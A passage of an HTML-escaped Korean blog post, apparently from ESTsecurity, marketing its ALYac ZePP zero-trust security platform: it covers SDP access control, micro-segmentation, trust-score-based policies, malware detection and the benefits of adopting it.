&lt;th style=&quot;padding: 15px 10px; width: 35.5814%; color: #444444; background-color: #fcfcfc;&quot;&gt;&lt;b&gt;제로트러스트 보안&lt;/b&gt;&lt;/th&gt;
&lt;/tr&gt;
&lt;tr style=&quot;border-bottom: 1px solid #e1e4e8; text-align: left;&quot;&gt;
&lt;th style=&quot;padding: 15px 10px; width: 29.6512%; color: #333333; background-color: #fcfcfc;&quot;&gt;&lt;b&gt;기본 전제&lt;/b&gt;&lt;/th&gt;
&lt;th style=&quot;padding: 15px 10px; width: 34.7674%; color: #444444; font-weight: normal;&quot;&gt;내부는 신뢰, 외부는 차단&lt;/th&gt;
&lt;th style=&quot;padding: 15px 10px; width: 35.5814%; color: #666666; font-weight: normal;&quot;&gt;모든 접근을 검증, 아무것도 신뢰하지 않음&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr style=&quot;border-bottom: 1px solid #e1e4e8;&quot;&gt;
&lt;td style=&quot;padding: 15px 10px; color: #444444; word-break: break-all; background-color: #fcfcfc; width: 29.6512%;&quot;&gt;&lt;b&gt;인증 방식&lt;/b&gt;&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #444444; width: 34.7674%;&quot;&gt;최초 1회 인증 후 자유 접근&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #666666; width: 35.5814%;&quot;&gt;접근 전&amp;middot;중&amp;middot;후&amp;nbsp;지속적&amp;nbsp;검증&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;border-bottom: 1px solid #e1e4e8;&quot;&gt;
&lt;td style=&quot;padding: 15px 10px; color: #444444; word-break: break-all; background-color: #fcfcfc; width: 29.6512%;&quot;&gt;&lt;b&gt;네트워크 구조&lt;/b&gt;&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #444444; width: 34.7674%;&quot;&gt;경계 안은 평면(Flat) 네트워크&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #666666; width: 35.5814%;&quot;&gt;마이크로 세그멘테이션으로 세분화&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;border-bottom: 1px solid #e1e4e8;&quot;&gt;
&lt;td style=&quot;padding: 15px 10px; color: #444444; word-break: break-all; background-color: #fcfcfc; width: 29.6512%;&quot;&gt;&lt;b&gt;내부 위협 대응&lt;/b&gt;&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #444444; width: 34.7674%;&quot;&gt;횡이동 탐지 어려움&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #666666; width: 35.5814%;&quot;&gt;세분화된 통제로 확산 차단&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;border-bottom: 1px solid #e1e4e8;&quot;&gt;
&lt;td style=&quot;padding: 15px 10px; color: #444444; word-break: break-all; background-color: #fcfcfc; width: 29.6512%;&quot;&gt;&lt;b&gt;정책 관리&lt;/b&gt;&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #444444; width: 34.7674%;&quot;&gt;솔루션별 개별 정책 운영&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #666666; width: 35.5814%;&quot;&gt;단일 플랫폼 통합 정책 관리&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;border-bottom: 1px solid #e1e4e8;&quot;&gt;
&lt;td style=&quot;padding: 15px 10px; color: #444444; word-break: break-all; background-color: #fcfcfc; width: 29.6512%;&quot;&gt;&lt;b&gt;원격 근무 대응&lt;/b&gt;&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #444444; width: 34.7674%;&quot;&gt;VPN 의존, 확장 한계&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #666666; width: 35.5814%;&quot;&gt;SDP 기반 동적 접근 제어&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;b&gt;알약 ZePP : 제로트러스트를 실현하는 통합 보안 플랫폼&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;이스트시큐리티의 '알약 ZePP(ZeroTrusted Endpoint Protection Platform)'는 제로트러스트 원칙을 기반으로 설계된 통합 보안 플랫폼입니다. 엔드포인트와 네트워크 전반의 신뢰도를 실시간으로 분석하고, 다양한 위협을 사전에 차단하며 즉시 대응할 수 있는 보호 체계를 제공합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;알약 및 알약 EDR의 강력한 엔드포인트 보안 역량에 SDP 기반 접근 제어, 마이크로 세그멘테이션, 신뢰도 점수 기반 자동 정책 조정 기능을 결합하여, 기업 및 기관의 업무 환경을 안전하게 보호합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;2276&quot; data-origin-height=&quot;1034&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/YEnr4/dJMcabiPwnu/1TgsEdNLrjAisSHniPTTok/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/YEnr4/dJMcabiPwnu/1TgsEdNLrjAisSHniPTTok/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/YEnr4/dJMcabiPwnu/1TgsEdNLrjAisSHniPTTok/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FYEnr4%2FdJMcabiPwnu%2F1TgsEdNLrjAisSHniPTTok%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;2276&quot; height=&quot;1034&quot; data-origin-width=&quot;2276&quot; data-origin-height=&quot;1034&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div style=&quot;background-color: #f8f9fa; border-left: 5px solid #dee2e6; padding: 15px 20px; margin: 20px 0; color: #495057;&quot;&gt;
&lt;p style=&quot;margin: 0; font-weight: bold;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #1b711d;&quot;&gt;Q. 기존에 알약, EDR을 쓰고 있는데 ZePP를 별도로 도입해야 하나요?&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;margin: 10px 0 0 0;&quot; data-ke-size=&quot;size16&quot;&gt;A.&amp;nbsp;알약&amp;nbsp;ZePP는&amp;nbsp;기존&amp;nbsp;알약&amp;middot;알약&amp;nbsp;EDR&amp;nbsp;위에&amp;nbsp;제로트러스트&amp;nbsp;접근&amp;nbsp;제어&amp;nbsp;계층을&amp;nbsp;얹는&amp;nbsp;구조입니다.&amp;nbsp;기존&amp;nbsp;엔드포인트&amp;nbsp;보안&amp;nbsp;투자를&amp;nbsp;그대로&amp;nbsp;활용하면서,&amp;nbsp;SDP&amp;middot;마이크로&amp;nbsp;세그멘테이션&amp;middot;신뢰도&amp;nbsp;기반&amp;nbsp;정책까지&amp;nbsp;확장할&amp;nbsp;수&amp;nbsp;있어&amp;nbsp;추가&amp;nbsp;도입&amp;nbsp;부담을&amp;nbsp;최소화할&amp;nbsp;수&amp;nbsp;있습니다.&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;b&gt;1. 제로트러스트 표준 준수&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div style=&quot;background-color: #ffffff; border: 1px solid #ced4da; border-radius: 8px; padding: 20px; margin: 20px 0; box-shadow: 0 2px 4px rgba(0,0,0,0.05);&quot;&gt;
&lt;p style=&quot;margin: 0; color: #212529;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif; color: #333333; text-align: start;&quot;&gt;알약 ZePP는 NIST SP 800-207(Zero Trust Architecture) &lt;/span&gt;NIST SP 800-207에서 제시하는 제로트러스트 기본 원칙(tenets)에 기반해 설계되었습니다.&lt;/p&gt;
&lt;p style=&quot;margin: 0; color: #212529;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif; color: #333333; text-align: start;&quot;&gt;국제 및 국내 표준을 기반으로 공공기관과 기업 환경 모두에서 신뢰성 높은 제로트러스트 보안 운영이 가능합니다.&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;b&gt;2. 동적 접근 제어 및 네트워크 보호&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div style=&quot;background-color: #ffffff; border: 1px solid #ced4da; border-radius: 8px; padding: 20px; margin: 20px 0; box-shadow: 0 2px 4px rgba(0,0,0,0.05);&quot;&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;b&gt;SDP(Software Defined Perimeter)&lt;/b&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;: 네트워크와 엔드포인트 자산에 대한 동적 접근 제어를 통해 비인가 접근을 원천 차단하고, 중요 자산에 대한 안전한 접속을 보장합니다.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;b&gt;Micro Segmentation&lt;/b&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;: 네트워크를 세분화하여 주요 데이터와 시스템을 보호하고, 내부 확산(Lateral Movement)을 효과적으로 방지합니다.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;b&gt;3. 엔드포인트 인증 및 신뢰도 기반 접근 통제&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div style=&quot;background-color: #ffffff; border: 1px solid #ced4da; border-radius: 8px; padding: 20px; margin: 20px 0; box-shadow: 0 2px 4px rgba(0,0,0,0.05);&quot;&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;b&gt;SDP&amp;nbsp;기반&amp;nbsp;단말&amp;nbsp;인증&amp;nbsp;및&amp;nbsp;접근&amp;nbsp;통제&lt;/b&gt;&amp;nbsp;:&amp;nbsp;등록된&amp;nbsp;디바이스와&amp;nbsp;사용자만&amp;nbsp;서비스에&amp;nbsp;접근하도록&amp;nbsp;통제하며,&amp;nbsp;비인가&amp;nbsp;장비의&amp;nbsp;접근을&amp;nbsp;원천&amp;nbsp;차단합니다.&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;b&gt;신뢰도 기반 접근 통제&lt;/b&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;: 허용된 단말이라도 사용자 행위와 신뢰도에 따라 권한을 동적으로 조정하여 보다 세밀한 보안 통제를 제공합니다.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imagegridblock&quot;&gt;
  &lt;div class=&quot;image-container&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/mdVuk/dJMcafetH0Y/KKIZCkeOMdOAZI4IxBzBGK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/mdVuk/dJMcafetH0Y/KKIZCkeOMdOAZI4IxBzBGK/img.png&quot; data-is-animation=&quot;false&quot; data-origin-width=&quot;902&quot; data-origin-height=&quot;466&quot; data-filename=&quot;Img_대시보드.png&quot; width=&quot;617&quot; height=&quot;319&quot; style=&quot;width: 58.6907%; margin-right: 10px;&quot; data-widthpercent=&quot;59.38&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/mdVuk/dJMcafetH0Y/KKIZCkeOMdOAZI4IxBzBGK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FmdVuk%2FdJMcafetH0Y%2FKKIZCkeOMdOAZI4IxBzBGK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;902&quot; height=&quot;466&quot;/&gt;&lt;/span&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cb9OA8/dJMcadnlU5k/kc2EDSToM5oJtu4lly5OCk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cb9OA8/dJMcadnlU5k/kc2EDSToM5oJtu4lly5OCk/img.png&quot; data-is-animation=&quot;false&quot; data-origin-width=&quot;617&quot; data-origin-height=&quot;466&quot; data-filename=&quot;Frame 1707481491.png&quot; style=&quot;width: 40.1465%;&quot; data-widthpercent=&quot;40.62&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cb9OA8/dJMcadnlU5k/kc2EDSToM5oJtu4lly5OCk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fcb9OA8%2FdJMcadnlU5k%2Fkc2EDSToM5oJtu4lly5OCk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;617&quot; height=&quot;466&quot;/&gt;&lt;/span&gt;&lt;/div&gt;
  &lt;figcaption&gt;[이미지] 알약 ZePP 제품 UI / (좌) 관리콘솔 (우) 에이전트&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;b&gt;4. 위협 탐지 및 대응&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div style=&quot;background-color: #ffffff; border: 1px solid #ced4da; border-radius: 8px; padding: 20px; margin: 20px 0; box-shadow: 0 2px 4px rgba(0,0,0,0.05);&quot;&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;b&gt;악성코드 및 랜섬웨어 대응&lt;/b&gt; : 알약 기반 EDR 및 행위 분석 기술을 통해 멀웨어 및 랜섬웨어를 탐지&amp;middot;차단하고, 위협 이벤트를 통합 관리합니다.&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;b&gt;실시간 위협 이벤트 기반 대응&lt;/b&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;: 탐지된 위협 정보를 즉시 정책 엔진에 반영하여, 보안 정책을 자동으로 최적화하고 대응 속도를 높입니다.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;b&gt;5. 신뢰도 점수 기반 보안 운영&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div style=&quot;background-color: #ffffff; border: 1px solid #ced4da; border-radius: 8px; padding: 20px; margin: 20px 0; box-shadow: 0 2px 4px rgba(0,0,0,0.05);&quot;&gt;
&lt;p style=&quot;margin: 0; color: #212529;&quot; data-ke-size=&quot;size16&quot;&gt;사용자&amp;middot;디바이스&amp;middot;네트워크&amp;middot;애플리케이션의&amp;nbsp;상태와&amp;nbsp;행위를&amp;nbsp;종합적으로&amp;nbsp;분석하여&amp;nbsp;신뢰도를&amp;nbsp;수치화하고,&amp;nbsp;위험도&amp;nbsp;변화에&amp;nbsp;따라&amp;nbsp;접근&amp;nbsp;정책을&amp;nbsp;동적으로&amp;nbsp;조정합니다.&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;table2&quot;&gt;
&lt;table style=&quot;width: 100%; border-collapse: collapse; line-height: 1.6; font-size: 14px;&quot; data-ke-align=&quot;alignLeft&quot;&gt;
&lt;thead&gt;
&lt;tr style=&quot;border-top: 2px solid #e1e4e8; border-bottom: 1px solid #e1e4e8; text-align: left;&quot;&gt;
&lt;th style=&quot;padding: 15px 10px; width: 22.5581%; color: #444444; background-color: #fcfcfc;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;  User&lt;/b&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;th style=&quot;padding: 15px 10px; width: 27.2093%; color: #444444; background-color: #fcfcfc;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;  Device&lt;/b&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;th style=&quot;padding: 15px 10px; width: 25.2326%; color: #444444; background-color: #fcfcfc;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;  Network&lt;/b&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;th style=&quot;padding: 15px 10px; width: 25%; color: #444444; background-color: #fcfcfc;&quot;&gt; &amp;nbsp;Application&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr style=&quot;border-bottom: 1px solid #e1e4e8;&quot;&gt;
&lt;td style=&quot;padding: 15px 10px; color: #444444; word-break: break-all; width: 22.5581%;&quot;&gt;&lt;span&gt;인증 수준, 행위 이상 여부&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #444444; width: 27.2093%;&quot;&gt;&lt;span&gt;OS 패치 상태, 보안 정책 준수 여부&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #444444; width: 25.2326%;&quot;&gt;&lt;span&gt;비정상 트래픽, 비인가 접속 시도&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #666666; width: 25%;&quot;&gt;&lt;span&gt;정책 위반 소프트웨어 실행 여부&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div style=&quot;background-color: #f8f9fa; border-left: 5px solid #dee2e6; padding: 15px 20px; margin: 20px 0; color: #495057;&quot;&gt;
&lt;p style=&quot;margin: 0; font-weight: bold;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #1b711d;&quot;&gt;&lt;b&gt;Q. 신뢰도 점수가 일정 기준 이하로 하락하면?&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;margin: 10px 0 0 0;&quot; data-ke-size=&quot;size16&quot;&gt;접근 권한 자동 축소 &amp;rarr; 추가 인증 요구 &amp;rarr; 필요 시 네트워크 격리까지 자동 수행&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;b&gt;6. 통합 보안 정책 관리&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div style=&quot;background-color: #ffffff; border: 1px solid #ced4da; border-radius: 8px; padding: 20px; margin: 20px 0; box-shadow: 0 2px 4px rgba(0,0,0,0.05);&quot;&gt;
&lt;p style=&quot;margin: 0; color: #212529;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif; color: #333333; text-align: start;&quot;&gt;네트워크, 파일, 애플리케이션 접근 정책을 하나의 플랫폼에서 통합적으로 관리하며, 조직 전체 보안 정책의 일관성을 유지합니다. 조직 및 업무 환경 요구에 적합한 정책을 유연하게 구성할 수 있어, 대규모 환경에서도 효율적인 운영이 가능합니다.&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;b&gt;알약 ZePP 도입 효과&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;div class=&quot;table4&quot;&gt;
&lt;table style=&quot;width: 100%; border-collapse: collapse; line-height: 1.6; font-size: 14px;&quot; data-ke-align=&quot;alignLeft&quot;&gt;
&lt;thead&gt;
&lt;tr style=&quot;border-top: 2px solid #e1e4e8; border-bottom: 1px solid #e1e4e8; text-align: left;&quot;&gt;
&lt;th style=&quot;padding: 15px 10px; width: 34.0698%; color: #444444; background-color: #fcfcfc;&quot;&gt;&lt;b&gt;도입 효과&lt;/b&gt;&lt;/th&gt;
&lt;th style=&quot;padding: 15px 10px; width: 65.9302%; color: #444444; background-color: #fcfcfc;&quot;&gt;&lt;b&gt;핵심 포인트&lt;/b&gt;&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr style=&quot;border-bottom: 1px solid #e1e4e8;&quot;&gt;
&lt;td style=&quot;padding: 15px 10px; color: #444444; background-color: #fcfcfc; width: 34.0698%;&quot;&gt;&lt;b&gt;보안 리스크 감소&lt;/b&gt;&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #444444; width: 65.9302%;&quot;&gt;제로트러스트&amp;nbsp;기반&amp;nbsp;지속&amp;nbsp;검증으로&amp;nbsp;비인가&amp;nbsp;접근&amp;nbsp;차단,&amp;nbsp;멀웨어&amp;middot;랜섬웨어&amp;nbsp;신속&amp;nbsp;대응,&amp;nbsp;실시간&amp;nbsp;컨텍스트&amp;nbsp;기반&amp;nbsp;접근&amp;nbsp;제어.&amp;nbsp;NIST&amp;middot;KISA&amp;nbsp;표준&amp;nbsp;부합&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;border-bottom: 1px solid #e1e4e8;&quot;&gt;
&lt;td style=&quot;padding: 15px 10px; color: #444444; background-color: #fcfcfc; width: 34.0698%;&quot;&gt;&lt;b&gt;자동화 기반 운영 효율화&lt;/b&gt;&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #444444; width: 65.9302%;&quot;&gt;직관적&amp;nbsp;대시보드&amp;middot;통합&amp;nbsp;정책&amp;nbsp;관리로&amp;nbsp;모니터링&amp;nbsp;및&amp;nbsp;대응&amp;nbsp;속도&amp;nbsp;향상.&amp;nbsp;신뢰도&amp;nbsp;변화&amp;nbsp;기반&amp;nbsp;자동&amp;nbsp;정책&amp;nbsp;조정으로&amp;nbsp;운영자&amp;nbsp;부담&amp;nbsp;감소&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;border-bottom: 1px solid #e1e4e8;&quot;&gt;
&lt;td style=&quot;padding: 15px 10px; color: #444444; background-color: #fcfcfc; width: 34.0698%;&quot;&gt;&lt;b&gt;단계적 전환 및 비용 절감&lt;/b&gt;&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #444444; width: 65.9302%;&quot;&gt;단일&amp;nbsp;플랫폼&amp;nbsp;통합으로&amp;nbsp;중복&amp;nbsp;솔루션&amp;nbsp;축소&amp;middot;유지보수&amp;nbsp;비용&amp;nbsp;절감.&amp;nbsp;Open&amp;nbsp;API&amp;nbsp;기반&amp;nbsp;기존&amp;nbsp;인프라&amp;nbsp;연동으로&amp;nbsp;단계적&amp;nbsp;전환&amp;nbsp;가능&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div&gt;
&lt;div style=&quot;background-color: #f8f9fa; border-left: 5px solid #dee2e6; padding: 15px 20px; margin: 20px 0; color: #495057;&quot;&gt;
&lt;p style=&quot;margin: 0; font-weight: bold;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #1b711d;&quot;&gt;&lt;span style=&quot;background-color: #f8f9fa; text-align: start;&quot;&gt;✔ &lt;/span&gt;이런 조직이라면, 알약 ZePP 도입을 검토해보세요!&lt;/span&gt;&lt;/p&gt;
